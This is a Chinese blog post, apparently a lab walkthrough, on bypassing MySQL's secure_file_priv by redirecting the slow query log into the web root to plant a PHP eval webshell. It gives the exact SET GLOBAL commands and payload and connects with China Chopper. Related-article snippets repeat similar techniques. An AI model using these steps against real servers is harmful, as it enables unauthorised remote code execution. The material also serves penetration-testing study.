MYSQL突破secure_file_priv写shell

最新推荐文章于 2023-09-19 15:35:42 发布
最新推荐文章于 2023-09-19 15:35:42 发布
阅读量1.8k 收藏 6
点赞数
分类专栏: # 权限提升
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40412037/article/details/104425605
版权

目标IP地址:192.168.106.130
本地IP地址:192.168.106.1
访问目标网络如下图所示:

实验场景:

某些情况下,当我们进入网站phpmyadmin或者网站后台执行SQL命令,计划通过select into outfile写一句话木马(shell),但是通常都会报错,如下图所示:
在这里插入图片描述
在这里插入图片描述

原因:

在mysql 中 secure_file_priv的值默认为NULL。并且无法用sql语句对其进行修改,只能够通过以下方式修改

windows:
修改mysql.ini 文件,在[mysqld] 下添加条目: secure_file_priv =
保存,重启mysql。

Linux:
在/etc/my.cnf的[mysqld]下面添加local-infile=0选项。

secure_file_priv作用:
secure_file_priv为null 表示不允许导入导出
secure_file_priv指定文件夹时,表示mysql的导入导出只能发生在指定的文件夹
secure_file_priv没有设置时,则表示没有任何限制
但是如果这样的话我们就不能够写shell了吗?答案是否定的。

突破限制利用方法:日志的利用

利用方法:
攻击时进行一次附带代码的url请求,在日志记录这次请求之后,通过文件包含漏洞来包含这个日志文件,从而执行请求中的代码。
mysql也具有日志,我们也可以通过日志来getshell。

mysql日志主要包含:错误日志、查询日志、慢查询日志、事务日志,日志的详细情况参考mysql日志详细解析

本次实验主要利用慢查询日志写shell,
第一步:
1.设置slow_query_log=1.即启用慢查询日志(默认禁用)。
在这里插入图片描述
分析:
在这里插入图片描述
slow_query_log=ON 已开启
第二步:修改slow_query_log_file日志文件的绝对路径以及文件名
作为攻击者不知道安装路径,可以输入:show variables like “%char%”,执行效果如下图所示,得到安装路径
在这里插入图片描述
修改slow_query_log_file日志文件的绝对路径以及文件名为C:\phpstudy\PHPTutorial\WWW\shell.php
set global slow_query_log_file=‘C:\phpstudy\PHPTutorial\WWW\shell.php’

目标靶机验证是否成功修改:
在这里插入图片描述
第三步:向日志文件写入shell,select ‘<?php @eval($_POST[x]);?>’ or sleep(11)
因为sleep(11),SQL语句正确的话,会延迟11秒后返回执行结果,耐心等待即可
在这里插入图片描述
第四步:访问shell.php日志文件
在这里插入图片描述
第五步:中国菜刀连接
在这里插入图片描述
连接成功
在这里插入图片描述
更多web安全工具与存在漏洞的网站搭建源码,收集整理在知识星球。可私信我,邀请你免费进
在这里插入图片描述

phpmyadmin突破secure_file_privshell 的渗透
qq_45906009的博客
06-22 621
有一天在公司,突然想起来自己有一个靶机没有复现漏洞,须视乎,搞一下子 首先通过VMware,我将虚拟机安装了。 上面是这台虚拟机的IP地址,二话不说拿7kb扫一下网站。 我们发现这个网站有一个phpmyadmin,二话不说试一下默认密码root/root 果然登录成功了 既然是root权限 那我们不上传shell 自己都看不下去 上次webshell需要有俩个条件 有读的权限 知道文件的绝对路径(这里我们知道 文件的绝对路径是什么 因为靶机在手 哈哈哈 ) 我们选择mysql数据库 看一下
MySQL绕过secure_file_priv利用慢查询shell
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
04-29 2833
通常情况下,找到一个注入点后,或者进入到一个网站的phpMyAdmin时,想通过into outfileshell时,会通常会报错 这是因为MySQL配置文件中的secure_file_priv的值默认为NULL。 只有当他为非空值的时候才可以利用into outfile文件。 我们可以利用日志来进行shell,然后利用文件包含漏洞来包含日志文件,从而拿到服务器一定的权限。 利用慢查询来shell 1、设置slow_query_log=1.即启用慢查询日志(默认禁用) set global slow
(2020上半年第8天)小迪网络安全笔记(问题①)如何突破MYSQLsecure_file_priv防护
u013630181的博客
06-20 661
文件读注入需要考虑mysql版本问题,高版本存在secure_file_priv过滤,高版本突破,低版本直接入 数据库如果是高版本,数据库会有防御,解决方法两种,硬钢或者绕过, 硬钢参考:https://www.cnblogs.com/c1e4r/articles/8902444.html 我是用硬刚的方法,下面是我硬钢的过程: 出现这样的问题: 在处理sqlilabs第七关, 入url:http:\\127.0.0.1\sqlilabs\Less-7\?id=1’)) union select nu
filebeat采集规则
lclxfd的博客
01-11 389
采集最新生产日志;日志按条采集,区分每条日志的字符分割符\n
mysql突破secure_file_privshell
weixin_34357887的博客
04-21 617
在某些情况下,当我们进入了一个网站的phpMyAdmin时,想通过select into outfileshell,但是通常都会报错。 这是因为在mysql 5.6.34版本以后 secure_file_priv的值默认为NULL。并且无法用sql语句对其进行修改,只能够通过以下方式修改 windows下: 修改mysql.ini 文件,在[mysqld] 下添加条目:secure...
php admin_priv,一次phpmyadmin突破secure_file_privshell 的渗透
weixin_39664560的博客
03-13 249
晚上下闲来无事,租的公寓一共两间房,我和另外一个同学各住一间,隔壁一墙之隔的他正在打游戏,我比较爱学习,随便玩玩,就突然引发了一次简单渗透。。。 无关紧要的过程就不了,下面简单记录下主要有用的步骤。首先nmap扫描内网发现发现内网里面存活的主机,不多,简单排除下,估计192.168.1.101就是隔壁室友的电脑了,发现80、3306端口图片.png访问下80,如下图,最近在做毕业设计,很明显这是...
【phpMyadmin】MYSQL突破secure_file_privshell提权
失心少年
09-19 1453
phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地方使用这些程式产生的HTML页面,也就是于远端管理MySQL数据库,方便的建立、修改、删除数据库及资料表。
【肾透测试笔记 --SQL注入篇_mysql
A98llen的博客
05-11 193
SQL注入篇_mysql(续)续一、前提条件1.secure_file_priv属性secure_file_priv属性如何设置2.绝对路径二、文件的读取文件读取用到 load_file() 函数三、文件的入前提文件入用到 into outfile() 和 into dumpfile() 函数四、补充 续 MySQL注入 基本手法,已经了解到关于MySQL基本的注入手法,sql注入可以对数据库中数据进行增删改查,故来复习一下关于sql注入的文件读取和入。 一、前提条件 1.secure_file_pr
利用数据库提权参考方法
bobo_milk的博客
11-26 1514
数据库提权方法
mysql safe file priv_解决MySQL导入数据时遇到secure-file-priv的问题
weixin_39638305的博客
01-19 250
使用以下mysql命令导入数据到mysql表时遇到“MySQL server is running with the –secure-file-priv” Errormysql> LOAD DATA LOCAL INFILE '/path/pet.txt' INTO TABLE pet;原因在于“secure_file_priv”这个设置的值,默认是NULL,这就禁止了我们导入数据。使用s...
mysql突破文件入_mysql突破secure_file_privwebshell
weixin_39606019的博客
02-08 157
在某些情况下,当我们进入了一个网站的phpMyAdmin时,想通过select into outfileshell,但是通常都会报错。这是因为在mysql 5.6.34版本以后 secure_file_priv的值默认为NULL。并且无法用sql语句对其进行修改,只能够通过以下方式修改日志利用:方法一:慢查询日志 (slow query log)mysql也具有日志,我们也可以通过日志来ge...
08MySQL 中的日志文件
greatwind的博客
09-21 1892
MySQL 中的日志文件错误日志中继日志普通查询日志慢查询日志二进制日志 MySQL 中有六种日志文件,分别是二进制日志(binary log)、错误日志(error log)、慢查询日志(slow query log)、通用查询日志(general query log)、中继日志(relay log)、元数据日志(metadata log),这些日志文件在数据库中各司其职。 错误日志 错误日志是用来记录 MySQL 服务器在启动、停止和运行过程中发生任何严重警告和错误的信息。 查看错误日志的位置: SHO
mysql无法导入导出的解决方法,修改secure_file_priv和local_infile详细步骤
mo926983的博客
08-23 8176
mysql8.0.19 系统 windows10 MySQL 报错 [Code: 1290, SQL State: HY000] The MySQL server is running with the –secure-file-priv option so it cannot execute this statement 通过show variables like ‘%secure_file_priv%’; secure_file_priv参数说明 这个参数用来限制数据导入和导出操作的效果,例如执行LOA
mysql5.7导出数据提示--secure-file-priv选项问题的解决方法
热门推荐
傲雪星枫
11-25 8万+
本文将介绍mysql5.7新特性--secure-file-priv的使用及限制导入导出的设定,提供完整调试过程及解决方法。
shell脚本实现Mysql慢日志切割
weixin_42555019的博客
03-18 740
mysql慢日志一般是不开启的,由于mysql慢日志是记录响应时间较长的SOL语句记录,一般小业务公司不建议开启,它会小范围的影响mysql性能。 开启Mysql慢日志,找到mysql的主配置文件: 我的配置文件路径为: /etc/my.cnf 执行此 vim /etc/my.cnf 命令 添加以下内容: slow_query_log = ON #开启慢日志 slow_query_lo...
导出数据提示--secure-file-priv选项问题的解决方法
jacklin_01的博客
05-30 7290
mysql可使用into outfile参数把表中数据导出到csv,例如可用以下命令把user表的数据导出到user.csv 1 select * from user into outfile '/tmp/user.csv' fields terminated by ',' optionally enclosed by '"' lines terminated by '\r\n 执行后,user表的数据会导出到/tmp/user.csv。 参数说明: int..
解决bug:the --secure-file-priv option so it cannot execute this statement
Promise Sun special column
04-20 6793
解决bug:the --secure-file-priv option so it cannot execute this statement ,设置一下secure-file-priv的值即可
mysql8.0配置文件部分详解
qq_2331233079的博客
05-15 4855
文章目录1、local_infile2、secure-file-priv3、 log_timestamps4、default-time_zone5、wait_timeout6、default_storage_engine7、default_authentication_plugin8、max_allowed_packet9、max_connections10、open_files_limit11、log_bin_trust_function_creators 1、local_infile [mysqld]
MySQL 文件读
iO快到碗里来
08-01 1万+
MySQL在不同版本读文件方法大致有这几个: 1.load_file() 2.load data infile() 3.system cat 4.outfile 5.dumpfile load_file()和load data infile读取文件的方法为:新建一个表,将读取文件以字符串形式插入表中,然后读出表中数据。load_file()也可以直接使用select load_file('文件路径') 读文件需满足条件 1.secure_file_priv值允许对该路径下的文件进行操作 2.数据库用户(m
he MySQL server is running with the --secure-file-priv option so it cannot execute this statement
最新发布
11-28
这个错误提示是因为MySQL服务器运行时启用了--secure-file-priv选项,该选项限制了可以从哪个目录导入数据。如果你尝试从不允许的目录导入数据,就会出现这个错误。为了解决这个问题,你可以按照以下步骤操作: 1. 找到MySQL配置文件my.cnf的位置,可以通过运行以下命令来查找: ```shell sudo find / -name "my.cnf" ``` 2. 打开my.cnf文件并找到[mysqld]部分。 3. 在[mysqld]部分中添加以下行: ```shell secure-file-priv="" ``` 这将禁用--secure-file-priv选项,允许从任何目录导入数据。 4. 保存并关闭my.cnf文件。 5. 重新启动MySQL服务器。 ```shell sudo service mysql restart ``` 现在你应该可以成功导入数据了。如果你仍然遇到问题,请确保你正在从允许的目录导入数据,并检查你的文件权限。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

W小哥1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值